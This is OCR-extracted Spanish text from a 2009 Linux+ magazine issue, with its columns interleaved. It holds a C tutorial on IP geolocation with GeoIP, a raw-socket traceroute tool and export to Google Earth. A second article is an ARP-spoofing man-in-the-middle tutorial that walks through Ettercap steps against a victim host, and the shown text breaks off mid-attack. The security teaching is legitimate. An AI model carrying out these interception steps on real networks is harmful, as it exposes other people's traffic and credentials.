ver el código de un país cuando éste se le pro-
GeoLite City GeoIP City
porciona como argumento y viceversa. Otras
son referentes a las ciudades, otras al código Cost Free $3700 initial, $90 per month
postal y así... Con la anterior lo obtenemos todo updates
y de un solo golpe. Coverage Worldwide Worldwide
Accuracy Over 99,5% on a country level Over 99,8% on a country level
Compilar and 79% on a city level for the and 83% on a city level for the
La cabecera principal para cualquier progra- US within a 25 mile radius. US within a 25 mile radius.
ma que desee utilizar la librería GeoIP es: Redistribution Free, subject to GPL/LGPL for Please contact us.
<GeoIP.h>. No obstante, nosotros utiliza- APIs and database license. Com-
remos en la directiva #include la cabecera mercial redistribution licenses are
<GeoIPCity.h> que incluye dentro de si available.
misma la anterior y nos facilitará el uso de
Updates Updated monthly, at the begin- Updated monthly. For binary
funciones adicionales. A la hora de la compi-
ning of each month. format, weekly updates, auto-
lación debemos hacer enlace correctamente a
mated udates available by using
la librería de esta forma:
geoipupdate program included
with C API.
$ gcc iplocate.c -lGeoIP -o iplocate

www.lpmagazine.org 39
 hacking para linuxeros
Geolocalización IP

Podría ser una de estas opciones (extraído del

README de GeoIP):

• GEOIP_STANDARD: Lee la base de

datos desde el disco duro. Usa menos me-
moria.
• GEOIP_MEMORY_CACHE: Carga la
base de datos en memoria. Mejora el ren-
dimiento pero usa más memoria.
• GEOIP_CHECK_CACHE: Comprueba si
la base de datos ha sido actualizada, en tal
caso la recarga.
• GEOIP_INDEX_CACHE: Mantiene un
índice de las búsquedas más recientes.
Muy eficiente en bases de datos grandes.
• GEOIP_MMAP_CACHE: Carga la base
de datos en la memoria compartida.

Ahora viene lo que todos buscan, cómo con-

seguir la información referente a una direc-
ción IP. El motor está presentado en el Lis-
tado 3.
Como puede comprobar, gir es rellenado
Figura 2. Los ordenadores por los que pasa la información antes de alcanzar la página web de LiNUX+
con todos sus campos si la IP buscada es lo-
calizada en la base de datos. Luego copiamos Ya se habrá dado cuenta de que con este Cuando lea las siguientes secciones cam-
todos los valores a nuestra estructura geohost y programa solo podemos consultar la localiza- biará de opinión. De todas formas piense que
seguidamente imprimimos los resultados. ción de un Host, y después todo termina. Con si integramos el código de las dos funciones
Utilizar estas funciones en un programa es esto podría suponer que la utilización de la principales en un programa interactivo, enton-
algo trivial. Podría servirle algo como lo que matriz geohost[] es una pérdida de memoria ces el modo en que trabajamos se torna bastante
presenta el Listado 4. innecesaria. eficiente.
NOTA: Si le gustan las listas enlazadas
Listado 1. Creando una estructura global que contenga la información de un host y se le da bien la programación en lenguaje C,
le animo a probarlo. Puede ser un buen ejercicio
[-----] de aprendizaje. Se vuelve útil en el desarrollo
struct host { de grandes aplicaciones donde establecer lí-
char ip[16]; /* Dirección IP */ mites arbitrarios puede convertirse en nuestra
char country[25]; /* País */ perdición.
char city[50]; /* Ciudad */ Si necesita más ejemplos, el propio código
float lat; /* Latitud */ fuente de GeoIP se los ofrece en la carpeta
float lon; /* Longitud */ test/.
} geohost[256]; /* Matriz de Hosts */
int cnt_ghost = 0; /* Llevar la cuenta */ Traceroute
[-----] Se estará preguntando tal vez que es un progra-
ma traceroute. Pues el mismo nombre lo indica,
Listado 2. Abriendo nuestra base de datos su objetivo es trazar una ruta de los distintos
ordenadores por los que nuestra información
[-----] (paquetes de red) va atravesando antes de llegar
void load_geoip(void) { al destinatario final. Esto normalmente implica
/* ABRIMOS LA BASE DE DATOS */ a routers, pasarelas, firewalls, puntos de acceso
gi = GeoIP_open("/usr/local/share/GeoIP/GeoLiteCity.dat", y demás.
GEOIP_INDEX_CACHE); Su distribución Linux siempre contará con
if (gi == NULL) { una aplicación traceroute. En la imagen (Figu-
fprintf(stderr, "\nError: Don't open database\n"); ra 2) le mostramos los ordenadores por los que
exit(1); pasa su información antes de alcanzar la página
} web de LiNUX+.
} A continuación le muestro un programa
[-----] muy básico para trazar la ruta de un host. Re-
quisitos:

40 Linux+ 4/2009
 hacking para linuxeros
Geolocalización IP

• LibPcap (versión 0.8),

Listado 3. Consiguiendo la información referente a una dirección IP
• LibNet (versión 1.1 o superior).
[-----]
void ip_location(char *host){
Compilar con:
int i, j;
$ gcc codigo.c
int find = 0;
-lpcap
GeoIPRecord *gir; /* Datos de una dirección IP */
-lnet
/* Si alcanzamos el límite de hosts, salimos */
-o broute
if (cnt_ghost == 256) {
printf("\nDemasiados hosts para localizar.\n");
return;
Uso está presentado en el Listado 5.
}
No tiene excesivo sentido explicar aquí có-
/* Si el HOST ya ha sido localizado,
mo funciona un programa de traceroute, pero
salimos */
daremos una pincelada ya que resulta realmente
for (i = 0; i < cnt_ghost; i++) {
sencillo.
if (strcmp(geohost[i].ip, host) == 0)
Si conocen el comando PING y su funcio-
return;
namiento, sabrán que su objetivo principal es
}
saber si un host en la red se encuentra activo.
/* Buscamos el HOST en la base de datos */
Esto se producirá cuando a una solicitud icmp
echo request (esto se establece en la cabecera
if ((gir = GeoIP_record_by_name(gi, host)) == NULL) {
return;
ICMP de un paquete de red), se produzca una
}
respuesta icmp echo reply (de ahí el efecto
cnt_ghost += 1; /* Hemos encontrado uno */
ping-pong).
/* Copiamos todos los datos en geohost[] */
Todos los paquetes TCP/IP que viajan
strncpy(geohost[cnt_ghost-1].ip, host, 15);
por la red, tienen en su cabecera IP un cam-
strncpy(geohost[cnt_ghost-1].country,
po especial conocido como TTL o tiempo de
gir->country_name, 24);
vida. Este valor suele ser constante en cada
if (gir->city)
sistema operativo. Por ejemplo en Windows
strncpy(geohost[cnt_ghost-1].city, gir->city, 49);
suele ser 128, mientras que en Linux es de
geohost[cnt_ghost-1].lat = gir->latitude;
64. Como anotación, fíjense que si hacen
geohost[cnt_ghost-1].lon = gir->longitude;
un ping desde su sistema operativo Linux a
/* Imprimimos la información */
una máquina con Windows, cada respuesta
printf("\nIP localizada: %s",
recibida por el programa mostrará el campo
geohost[cnt_ghost-1].ip);
TTL de cada una de ellas. Visualizar su va-
printf("\nPais: %s",
lor es una forma muy pobre (aunque rápida
geohost[cnt_ghost-1].country);
y eficaz en sistemas de usuarios no concien-
printf("\nCiudad: %s",
ciados por la seguridad), de identificar el
geohost[cnt_ghost-1].city);
Sistema Operativo que está corriendo en un
printf("\nLatitud: %f",
ordenador.
geohost[cnt_ghost-1].lat);
Un programa de traceroute se aprovecha
printf("\nLongitud: %f",
del protocolo ICMP, que se encarga de con-
geohost[cnt_ghost-1].lon);
trolar los errores en la red, para averiguar
}
qué hosts se encuentran entre su ordenador
[-----]
y el objetivo.
Como decía, el TTL sale de su ordenador
Listado 4. Consiguiendo la información referente a una dirección IP
con un valor constante, pero éste va decre-
mentándose cada vez que alcanza un ordena-
[-----] dor (vulgarmente a cada salto). Si en algún
int main(int argc, char *argv[]) { lugar del trayecto, antes de llegar a su desti-
if (argc < 2) { no, este TTL consiguiera llegar a 0, significa-
printf("\nUsage: ./iplocate x.x.x.x\n"); ría que el paquete ha caducado, y el ordena-
exit(1); dor o host que hizo este último decremento
} lo notificará al emisor original mediante un
load_geoip(); /* Abrimos la Base de Datos */ paquete ICMP especial (tipo ICMP_TIMX-
ip_location(argv[1]); /* Localizamos un Host */ CEED y código ICMP_TIMXCEED_IN-
return 0; /* Por algo devolvemos “int” */ TRANS), indicándole que el tiempo de
} vida ha excedido.
[-----] Pues resulta que alguien muy pero que muy
espabilado se dio cuenta de que, si mandaba un

www.lpmagazine.org 41
 hacking para linuxeros
Geolocalización IP

Listado 5a. Trazando la ruta de un host

- $ ./broute x.x.x.x dev * Iniciamos la captura de paquetes

[-----] */
/* Declaraciones de cabeceras */ void *
#include <stdio.h> sniff_route(void *var) {
#include <string.h> int rc;
#include <pcap.h> char errbuf[PCAP_ERRBUF_SIZE];
#include <libnet.h> struct bpf_program filter_code;
/* Aceptar solo paquetes tipo = ICMP_TIMXCEED bpf_u_int32 netp, maskp;
y código = ICMP_TIMXCEED_INTRANS */ pcap_t* sniff_route;
#define FILTRO_ROUTE "icmp[0] = 0 or icmp[0] = 11" /* ABRIMOS LA INTERFAZ DE RED */
static u_int32_t src_ip; sniff_route = pcap_open_live(device,
static u_int32_t dst_ip; 256, 0, 1000, errbuf);
static u_int16_t id; if (sniff_route == NULL){
static int endsr = 0; fprintf(stderr,
static char *device; "Error en pcap_open_live(): %s\n", errbuf);
static libnet_t *lnet; exit(-1);
/* }
* Lee las respuestas a los paquetes enviados /* OBTENEMOS LOS DATOS DE LA INTERFAZ DE RED */
*/ if (pcap_lookupnet(device, &netp, &maskp,
static void errbuf) == -1){
read_response(u_char *useless, fprintf(stderr, "Error en pcap_lookupnet():
const struct pcap_pkthdr* pkthdr, %s\n", errbuf);
const u_char* pkt) { exit(-1);
struct libnet_ethernet_hdr *ethh; }
/* CABECERA ETHERNET */ /* ESTABLECEMOS EL FILTRO DE PAQUETES */
struct libnet_ipv4_hdr *iph; if (pcap_compile(sniff_route, &filter_code,
/* CABECERA IP */ FILTRO_ROUTE, 1, netp) == -1){
struct libnet_icmpv4_hdr *icmph; fprintf(stderr, "Error en pcap_compile():
/* CABECERA ICMP */ %s\n",
ethh = (struct libnet_ethernet_hdr *)pkt; pcap_geterr(sniff_route));
iph = (struct libnet_ipv4_hdr *) exit(-1);
(pkt + LIBNET_ETH_H); }
icmph = (struct libnet_icmpv4_hdr *) /* ACTIVAMOS EL FILTRO DE PAQUETES */
(pkt + LIBNET_ETH_H + LIBNET_IPV4_H); if (pcap_setfilter(sniff_route,
/* AQUI LA RESPUESTA DEL OBJETIVO FINAL */ &filter_code) == -1){
if (iph->ip_src.s_addr == dst_ip) { fprintf(stderr,
/* ip_location(libnet_addr2name4(iph-> "Error en pcap_setfilter(): %s\n",
ip_src.s_addr, 0)); */ pcap_geterr(sniff_route));
/* toGoogleEarth(); */ exit(-1);
printf("\nOBJETIVO ALCANZADO: %s\n", }
libnet_addr2name4(iph->ip_src.s_addr, 0)); /* INICIAMOS LA CAPTURA DE PAQUETES */
endsr = 1; rc = pcap_loop(sniff_route, -1,
pthread_exit(NULL); &read_response, NULL);
} }
/* AQUI LA RESPUESTA DE LOS HOSTS int main(int argc, char *argv[]) {
O ROUTERS INTERMEDIOS */ int c;
else if (icmph->icmp_type == ICMP_TIMXCEED && int ttl = 1;
icmph->icmp_code == u_int8_t *payload = NULL;
ICMP_TIMXCEED_INTRANS) { u_int32_t payload_s = 0;
/* ip_location(libnet_addr2name4(iph-> libnet_ptag_t icmp_pkt = 0;
ip_src.s_addr, 0)); */ libnet_ptag_t ip_pkt = 0;
printf("\nRespuesta desde: %s\n", pthread_t th_sniffroute;
libnet_addr2name4(iph->ip_src.s_addr, 0)); if (argc < 3){
} fprintf(stderr, "\nUsage:
} ./broute x.x.x.x dev\n");
/* exit(-1);

42 Linux+ 4/2009
 hacking para linuxeros
Geolocalización IP

www.lpmagazine.org 43
 hacking para linuxeros
Geolocalización IP

Listado 5b. Trazando la ruta de un host

} ICMP: %s\n",
device = argv[2]; /* La interfaz como libnet_geterror(lnet));
segundo parámetro */ }
lnet = libnet_init(LIBNET_RAW4, device, errbuf); /* Construimos la cabecera IP */
if (lnet == NULL) { ip_pkt = libnet_build_ipv4(LIBNET_IPV4_H +
fprintf(stderr, "libnet_init failed: LIBNET_ICMPV4_ECHO_H + payload_s, 0, id, 0,
%s\n", errbuf); ttl, /* Tiempo de Vida */
exit(-1); IPPROTO_ICMP, 0,
} src_ip, /* IP de origen */
/* Obtenemos nuestra dirección IP */ dst_ip, /* IP de destino */
src_ip = libnet_get_ipaddr4(lnet); NULL, 0, lnet, ip_pkt);
pthread_create(&th_sniffroute, NULL, if (ip_pkt == -1){
sniff_route, NULL); fprintf(stderr, "Error en Caberera IP:
/* Host objetivo como primer parámetro */ %s\n",
dst_ip = libnet_name2addr4(lnet, argv[1], libnet_geterror(lnet));
LIBNET_RESOLVE); exit(-1);
if (dst_ip == -1){ }
fprintf(stderr, "IP de Destino erronea.\n"); c = libnet_write(lnet); /* Enviamos
exit(-1); el paquete */
} usleep(1000); /* Pausa entre paquetes
sleep(1); /* Damos tiempo a que se inicie enviados */
el hijo correctamente */ ttl += 1; /* Incrementamos el Tiempo
while(endsr == 0){ /* El hilo hijo pondrá de Vida del paquete */
(endsr == 1) cuando termine */ }
/* Construimos la cabecera ICMP */ libnet_clear_packet(lnet); /* Limpiamos */
icmp_pkt = libnet_build_icmpv4_ pthread_cancel(th_sniffroute); /* Matamos
echo(ICMP_ECHO, 0, 0, id, 0, el hilo */
payload, /* NULL */ endsr = 0;
payload_s, /* 0 */ reurn 0; /* Salida exitosa*/
lnet, icmp_pkt); }
if (icmp_pkt == -1){ [-----]
fprintf(stderr, "Error en Cabecera

paquete especialmente creado con el TTL pues-
to a 1, el primero de los hosts intermediarios
que recibiera el paquete, decrementaría este
contador y emitiría su correspondiente men-
saje de error, pudiendo así el emisor obtener
la dirección IP de este punto intermedio.
Ocurre que si luego volvía a reenviar este
mismo paquete con un valor de TTL puesto
a 2, el error sería emitido por el segundo host
intermediario, puesto que es donde el tiempo
de vida expiraría. Siguiendo este proceso de
incrementar el TTL y capturar los errores
ICMP, el emisor solo tiene que comprobar
cuándo la respuesta proviene de la dirección
IP objetivo. En este momento sabrá que ha
terminado de recorrer el trayecto y tendrá
todas las direcciones de los routers o hosts
intermediarios.
Puede observar que si hace un ping a
LiNUX+, recibirá respuestas con un TTL de
44 o algo así, esto es debido a que el paquete
recibido por usted también tiene que recorrer el
camino inverso.Si sale con un valor de 64 irá
decrementándose a medida que atraviesa la red.
Con esto también podría descubrir un Sistema
Operativo, piense que no sería normal en este
caso que el TTL hubiera bajado de 128 a 44,
serían demasiados saltos. Es lógico pensar que
originalmente era 64.
Bien, si leyó atentamente la función
read_response(), pudo observar un par
de funciones que dejamos deliberadamente
comentadas:
/* ip_location(libnet_
addr2name4(iph->
ip_src.s_addr, 0)); */
/* toGoogleEarth(); */
Figura 3. Efecto de exportación a GoogleEarth
La primera de ellas, obviamente, es la función
que programamos al principio de este artículo,
y que si agrega al programa de traceroute
(uniendo las piezas) le dirá en qué lugar del
mundo se encuentra cada uno de los ordenado-
res por los que van pasando sus paquetes. Lo
cual es el objetivo de este artículo.
La segunda función, en caso de descomen-
tarla, se ejecutará una vez el destinatario final
haya sido alcanzado. Su misión se explica en la
siguiente sección.
Exportar a GoogleEarth
La función toGoogleEarth() crea un archivo
en formato XML (con extensión .kml) cuyas

44 Linux+ 4/2009
 hacking para linuxeros
Geolocalización IP

Listado 6. Exportando a GoogleEarth

Sobre el autor
[-----] David Puente Castro, alias blackngel, es
void toGoogleEarth(int cnt_ghost) { un gran aficionado a la programación y la
int i = 0; seguridad informática. Original de Ourense
FILE *fge; y viviendo actualmente en la provincia de
fge = fopen("routeGE.kml", "w"); /* Abrimos el Salamanca, dedica la mayor parte de su
archivo para escritura */ tiempo libre a disfrutar de la experiencia
fprintf(fge, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"); Linux.
fprintf(fge, "<kml xmlns=\"http://earth.google.com/kml/2.0\">\n"); Asiduo escritor de artículos básicos
fprintf(fge, "<Folder>\n"); sobre temas de seguridad informática en
fprintf(fge, "<name>Hack The World</name>\n"); el E-Zine electrónico S.E.T. (Saqueado-
fprintf(fge, "<visibility>1</visibility>\n"); res Edición Técnica), actualmente man-
for(i = 0; i < cnt_ghost; i++){ tiene su segunda página oficial en: http://
fprintf(fge, "\n<Placemark>\n"); set.diazr.com/, cuyo objetivo es ser un
fprintf(fge, " <name>%s</name>\n", geohost[i].ip); gran repositorio de material sobre temas
fprintf(fge, " <description><![CDATA[ IP:%s ]]> de hacking.
</description>\n", Su primer encuentro con Linux data
geohost[i].ip); ya de hace unos 8 años y fue poco más
fprintf(fge, " <description></description>\n"); adelante que descubrió el fantástico
fprintf(fge, " <View>\n"); mundo de la programación y la subcul-
fprintf(fge, " <longitude>%f</longitude>\n", geohost[i].lon); tura hacker. Participa activamente en
fprintf(fge, " <latitude>%f</latitude>\n", geohost[i].lat); wargames como: yoire.com, warzone
fprintf(fge, " </View>\n"); (elhacker.net) y otros.
fprintf(fge, " <visibility>1</visibility>\n"); Puede encontrarlo online prácticamente
fprintf(fge, " <styleUrl> las 24 horas del día, en las siguientes direc-
root://styleMaps#default?iconId=0x307 ciones: blackngel1@gmail.com y black@
</styleUrl>\n"); set-ezine.org
/* ICONO PARA MARCAR LOS PUNTOS
fprintf(fge, Conclusiones
"<Style><icon>images/x.png</icon></Style>\n"); Si tiene un poco de habilidad y ha seguido
*/ hasta aquí todo lo descrito, entonces está en
fprintf(fge, " <Point><coordinates>%f,%f, el camino correcto. Ahora está preparado pa-
45</coordinates></Point>\n", ra unir las piezas del puzzle y disfrutar de la
geohost[i].lon,geohost[i].lat); satisfacción que produce hacer las cosas por
fprintf(fge, " </Placemark>\n"); uno mismo.
} Si no conoce LibNet, LibPcap o si la
fprintf(fge, "</Folder>\n"); programación de threads (hilos) todavía está
fprintf(fge, "</kml>"); fuera de su alcance, entonces no se preocu-
fclose(fge); pe. Puede centrarse únicamente en la sec-
printf("\nArchivo \"routeGE.kml\" correctamente creado\n"); cion que trataba exclusivamente sobre Ge-
} oIP y sacar el máximo partido de lo que allí
[-----] describimos.

marcas serán interpretadas directamente por el
programa GoogleEarth estableciendo puntos a
lo largo del globo terraqueo, situando cada uno
de los hosts que haya ido localizando nuestra
implementación de GeoIP.
Esta función debe conocer:
• Una estructura en la que se hayan ido
almacenando los hosts localizados me-
diante GeoIP (de ahi que usaramos geo-
host[]).
• Un contador con el total de las IP's encon-
tradas (pasado como argumento).
Esta función debe ser añadida nuevamente
al programa de traceroute. Una vez un host
En la red
ha sido traceado, un archivo con nombre
routeGE.kml será creado en el mismo di- • MaxMind:
rectorio donde ha compilado su aplicación. http://www.maxmind.com
Si ahora abre este archivo mediante Google • LibPcap:
Earth, podrá observar algo parecido a lo si- http://sourceforge.net/projects/
guiente en la Figura 3. libpcap/
Solo tiene que ir haciendo click en cada • LibNet:
una de las chinchetas o direcciones IP, y su http://libnet.sourceforge.net
globo terraqueo interactuará correctamente • GoogleEarth:
para llevarle hasta su correcta localiza- http://earth.google.es/
ción.

www.lpmagazine.org 45
 hacking para linuxeros
Ataques Man In The Middle

Ataques Man
In The Middle:
Su información en manos enemigas
David Puente Castro

Su información viaja a diario de un ordenador a otro. Está ciertamente

acostumbrado a confiar en que llegará siempre a su destino. Pero... ¿se ha
preguntado alguna vez si alguno de estos ordenadores intermediarios puede
estar controlando todo su tráfico en busca de información sensible?

H
oy en dia lo más común es que todas las Más claramente. Si usted dispone de una red Wireless
linux@software.com.pl

empresas utilicen redes de area local para
compartir recursos. Además, el hardware que
permite esta clase de conexión tiene un coste
muy bajo y su integración es verdaderamente rápida.
Por otro lado, las redes Wireless están creciendo como
nunca hasta ahora había ocurrido. Y del mismo modo, no de-
jan de ser redes locales en las que, por norma general, existe
un router o pasarela que proporciona una salida común al
resto de ordenadores hacia Internet.
Usted debe considerar la siguiente idea: cabría la po-
sibilidad de que alguien pueda situarse entre su ordenador
de trabajo habitual y el router o gateway, con el objetivo de
capturar todo el tráfico que se encuentra transmitiendo en un
instante dado.
Ya en un artículo anterior de LiNUX+, en concreto uno
sobre capturar conversaciones de Messenger, se dieron unas
pinceladas acerca de en qué consistía un ataque Man In The
Middle. Un ataque hombre en el medio, como bien se men-
cionó, es una situación que puede ser creada por un atacante y
que permite suplantar la identidad de un dispositivo receptor
con el fin de engañar a otro emisor.
casera. El proceso normal de comunicación cuando soli-
cita, por ejemplo, una página web desde su navegador, es
que esta petición es remitida a su punto de acceso (router/
gateway), que se encarga de realizar la petición efectiva
al servidor web en Internet, y el mismo router es el que
le devuelve la respuesta correspondiente. Podría verse de
este modo:
• Petición: PC (Host) -> petición web
-> ROUTER O PASARELA -> petición web
-> INTERNET.
• Respuesta: INTERNET -> respuesta
-> ROUTER O PASARELA -> respuesta
-> PC (Host).
La posibilidad de colocar virtualmente un ordenador entre
el PC (Host) y el Router o Pasarela, es real. Y en este docu-
mento tenemos como meta presentar un ejemplo práctico de
cómo llevar a cabo este ataque, para posteriormente echar un
vistazo a las posibles defensas de que disponemos y cómo
aplicarlas.

46 Linux+ 4/2009

Protocolo ARP
Existen varias técnicas que permiten la
redirección de tráfico o la suplantación de
identidad, pero ARP Spoofing es una de las
más sencillas y permite una explicación
ciertamente intuitiva.
Primero debemos de conocer qué es en rea-
lidad ARP. ARP o Address Resolution Proto-
col, como su propio nombre indica, es un
protocolo que se encarga de resolver direc-
ciones. Pero... ¿qué direcciones?
Todo ordenador conectado a una red
consta de al menos dos direcciones, una
bastante común para el usuario de a pie,
concida como dirección IP, compuesta de 4
digitos enteros separados por puntos que van
desde el 0 al 255. Esta dirección se puede
cambiar ya sea de forma manual o automáti-
camente.
Por el contrario, existe otra dirección
que es inmutable. Cada tarjeta de red ether-
net trae de fábrica una dirección compuesta
de 6 pares de digitos separados por dos
puntos, tal que su formato se ve como sigue:
aa:bb:cc:dd:ee:ff. Esta dirección se conoce
como MAC y es, supuestamente, única en
todo el mundo para cada tarjeta de red.
Las redes funcionan bajo un modelo de
capas conocido como OSI. Modelo que pre-
sentamos a continuación, en la Figura 2.
Switch/Hub
Punto de acceso
inalámbrico
Portátiles
Figura 1. Esquema del ataque Man In The Middle
En la gran red de redes, cuando un ordena-
dor intenta comunicarse con otro, necesita se-
guir unas reglas básicas. Una de las normas
principales es que todos los paquetes que son
transmitidos pasen previamente por unas capas
establecidas. Cada una de ellas tiene una
misión, y todas son importantes para que el
paquete llegue correctamente a su destino:
• Capa Física: Realmente hablamos de
esta capa como hardware. Es el medio
físico de comunicación entre dos orde-
nadores, ya sea cableado o no.
• Capa de Enlace: En esta capa funcionan
los protocolos Ethernet, Frame Relay,
ARP, etc...
• Capa de Red: Aquí nos encontramos con
el gran IP (Internet Protocol), establece
de dónde proceden los paquetes y a quién
se dirigen, amén de otros detalles sobre
su enrutamiento.
• Capa de Transporte: Esta capa aporta el
control. TCP y UDP se encuentran aquí,
y mantienen el control de flujo de datos
verificando su integridad (con UDP no
es del todo cierto).
• Capa de Sesión: Establece conexiones
lógicas entre puntos de la red. Se encarga
también de ciertos aspectos como la sin-
cronización.
PCs
Impresoras
de red
Router ADSL
INTERNET
www.lpmagazine.org
hacking para linuxeros
Ataques Man In The Middle
OSI Model
Data Layer
Data Aplication
Host Layers
Data Presentation
Data Session
Segments Transport
Packets Network
Media Layers
Frames Data Link
Bits Physical
Figura 2. Modelo de capas conocido como OSI
• Capa de Presentación: Esta capa se encar-
ga de los formatos y el manejo de la es-
tructura de los datos que viajan por la red.
Controla si los datos estan comprimidos,
cifrados, codificados, etc...
• Capa de Aplicación: Es la capa que inte-
ractúa directamente con el usuario, o al
menos con el sistema operativo. Proto-
colos como HTTP, SSH, FTP, y muchos
otros se encuentran en este lugar.
Cada paquete que desea cruzar una red, sale
de un ordenador y atraviesa todas las capas
comenzando por la Capa de Aplicación, hasta
llegar a la Capa Física. Una vez el paquete
llega a su destinatario, este asciende nueva-
mente a través de las capas OSI, pero esta
vez en sentido contrario llegando definitiva-
mente a la aplicación o servicio del usuario
receptor.
TCP e IP, protocolos que más o menos
todos conocemos al menos de oídas, trabajan
en la cuarta (transporte) y tercera (red) capa
del modelo respectivamente. Lo importante
en este punto, es asimilar que todavía por
debajo de estos, en la capa de enlace, se en-
cuentra el protocolo ARP.
Estamos acostumbrados a pensar que
nuestros ordenadores se comunican unos
con otros única y exclusivamente a través
de la dirección IP, y si bien esto es cierto,
en las redes locales existe otro modo de
operación que por norma general agiliza
los trámites.
Cuando un ordenador cliente realiza una
petición a Internet, esta debe ser enviada en
primera instancia al router (como ya vimos
hace un momento). En el nivel más bajo tanto
el cliente como el router se comunican a tra-
vés de la dirección MAC, pero... ¿comó sabe
el cliente la dirección MAC del router?
47
 hacking para linuxeros
Ataques Man In The Middle

así tiempo y evitando congestión en la

red.

ARP spoofing
Este ataque, también conocido como ARP
Router ADSL Poisoning se basa en dos consignas:
IP: 10.0.0.1
MAC: [cc:cc:cc:cc:cc:cc]
• El protocolo ARP permite respuestas
a preguntas no realizadas.
modified ARP cache points • Estas respuestas actualizan las tablas
IP: 10.0.0.1 to Alice caché ARP de los miembros implicados.
MAC: [ee:ee:ee:ee:ee:ee] IP: 10.0.0.1
(Eve’s MAC) MAC: [aa:aa:aa:aa:aa:aa]
Imaginémonos la situación de la imagen pre-
modified ARP cache points
IP: 10.0.0.1 to sentada en la Figura 3. Tenemos:
MAC: [ee:ee:ee:ee:ee:ee]
(Eve’s MAC)
• Router -> IP: 10.0.0.1 – MAC: cc:cc:cc:
cc:cc:cc
Eve
IP: 10.0.0.1 • Alice -> IP: 10.0.0.10 – MAC: aa:aa:aa:aa:
MAC: [ee:ee:ee:ee:ee:ee] aa:aa
• Eve -> IP: 10.0.0.3 – MAC: ee:ee:ee:ee:
Figura 3. ARP Spoofing
ee:ee
Bien, ARP es un protocolo que soporta El truco está en que esta pregunta solo será res-
broadcasting. Esta es una característica que pondida por aquel miembro que posea esa IP, Cuando Alice desee comunicarse con otro
permite enviar un paquete a todos los or- y lo hará indicando su propia MAC. host en la red, o mismo una petición hacia
denadores de una red de forma simultánea. Internet, preguntará en algún momento cúal
Teniendo en cuenta que el cliente ya conoce ¿Por qué decías es la dirección MAC correspondiente a la IP
aquello de agilizar
la dirección IP del router (p.e.: 192.168.0.1), 10.0.0.1. El Router contestará con la suya
si desea averiguar su dirección MAC, debe los trámites? propia, cc:cc:cc:cc:cc:cc y Alice introducirá
realizar una Petición ARP a la dirección de Cada miembro de la red posee una tabla en su Caché ARP una entrada que relacione
broadcast, lo que produce un paquete que conocida por el nombre de Cache ARP. En mutuamente la dirección IP con la dirección
oirán todos los miembros de la red. esta tabla se van almacenando las respues- MAC. Durante un tiempo no tendrá que vol-
Una petición ARP lleva consigo un men- tas a preguntas como la que acabamos de ver a repetir la pregunta, pues le basta con
saje del estilo: realizar. De este modo, la próxima vez que consultar su tabla para saber a quién debe
el cliente quiera enviar algo al router, bus- enviar sus futuras peticiones.
• ¿Qué dirección MAC tiene el miembro de cará aquí su dirección MAC y no tendŕa Pero como hemos dicho hace un ins-
la red con la dirección IP 192.168.0.1? que volver a preguntar por ella, ahorrando tante, Alice puede aceptar respuestas a una
pregunta que no ha realizado y actualizar su
caché con los datos de esta respuesta. En la
jerga, a este tipo de paquetes se les llama
ARP no solicitados o ARP gratuitos.
Entonces, ¿qué ocurriría si Eve envía
una respuesta ARP a Alice haciéndose pasar
por el Router y diciéndole que la dirección
IP 10.0.0.1 corresponde a la MAC ee:ee:
ee:ee:ee:ee? Pues que a partir de ese mo-
mento Alice enviaría todas sus peticiones
a Eve pensando que en realidad se trata del
Router.
Si además, ahora hacemos lo mismo con
Router, haciéndole pensar que la dirección IP
de Alice se corresponde con la MAC de Eve,
habremos logrado situarnos exactamente en
un punto medio entre los dos miembros de la
comunicación. Nos habremos convertido en:
el hombre en el medio.

Ettercap, un ejemplo real

Este ataque es más que posible, es real.
Figura 4. Ettercap No podemos decir que sea nuevo, pero por

48 Linux+ 4/2009

Figura 5. Tabla caché ARP normal
desgracia resulta ser inherente al protocolo
y erradicar tal comportamiento dista bastante
del modo en que podemos reparar un simple
bug de software.
Ettercap es un programa que hace las
veces de sniffer (capturador de tráfico), otras
de reconocimiento de sistemas operativo,
y otras de plataforma para ataques Man In
The Middle. Lo cierto es que de un tiempo a
esta parte, Ettercap incorpora tantos módu-
los que es igual que llevar una navaja suiza
en el bolsillo.
Haremos uso de este programa para
realizar la prueba de ataque; pero antes de
nada debemos de activar una característica
muy importante en nuestro sistema de red,
conocida con el nombre de ip forwarding.
Esta funcionalidad provoca que todos los
paquetes que pasen por nuestra máquina (la
del atacante), sean reenviados a su destino
original. El objetivo es no detener el flujo
de datos y hacer creer a la víctima que su
conexión es completamente normal. De otro
modo, los paquetes se detendrían al llegar
a nuestra máquina, y si bien podemos ver
las peticiones que realiza, éste nunca reci-
birá respuestas, y pronto percibirá que algo
raro está ocurriendo.
Como root debe escribir el siguiente
comando:
# echo 1 >
/proc/sys/net/
/ipv4/ip_forward
Puede obtener e instalar Ettercap, en De-
bian o derivados, directamente con el co-
mando apt-get o aptitude, dado que esta
aplicación se encuentra habitualmente entre
los repositorios por defecto. Para cualquier
otra plataforma puede descargar el código Figura 6. Resultado de nuestro escaneo
fuente del programa desde su página oficial
en: http://ettercap.sourceforge.net
El programa dispone de 3 modos: consola,
ncurses, e interfaz gráfica. Utilizaremos este
útlimo por su comodidad. Puede iniciarlo de
este modo:
$ sudo
ettercap -G
Nuestra misión es colocarnos virtualmente en
el medio de un sistema Windows XP y el Punto
de Acceso que le proporciona acceso a Internet.
Claro está nosotros también debemos pertene-
cer a esa misma red.
Una tabla caché ARP normal se ve como
en la Figura 5.
www.lpmagazine.org
hacking para linuxeros
Ataques Man In The Middle
Como se puede ver, una sola entrada
ARP que relaciona la dirección IP del Punto
de Acceso con su dirección MAC. Debemos
proceder ahora a suplantar esta entrada. En
Ettercap abrimos el menú Sniff y hacemos
click en la opción Unified Sniffing. Nos
pedirá que introduzcamos el nombre de la
interfaz de red, en nuestro caso utilizare-
mos ath0 (una tarjeta wireless con chipset
atheros).
Una vez aceptado, vemos que las opcio-
nes de menú han cambiado. Ahora debemos
averiguar qué ordenadores se encuentran en
la misma red. Para ello, en el menú Hosts se-
leccionamos la opción Scan for hosts. Pue-
de ver en la imagen el resultado de nuestro
escaneo.
Tenemos:
• 192.168.0.1: Punto de Acceso,
• 192.168.0.192: Víctima (SO Windows).
Si observa nuevamente el campo MAC Ad-
dress, será consciente de que el host víctima
almacenaba la dirección correcta en su caché
ARP.
Lo que sigue es el ataque en sí. En pri-
mer lugar debemos seleccionar la entrada
correspondiente a la víctima, hacer click en
el botón Add to Target 1, y realizar el mismo
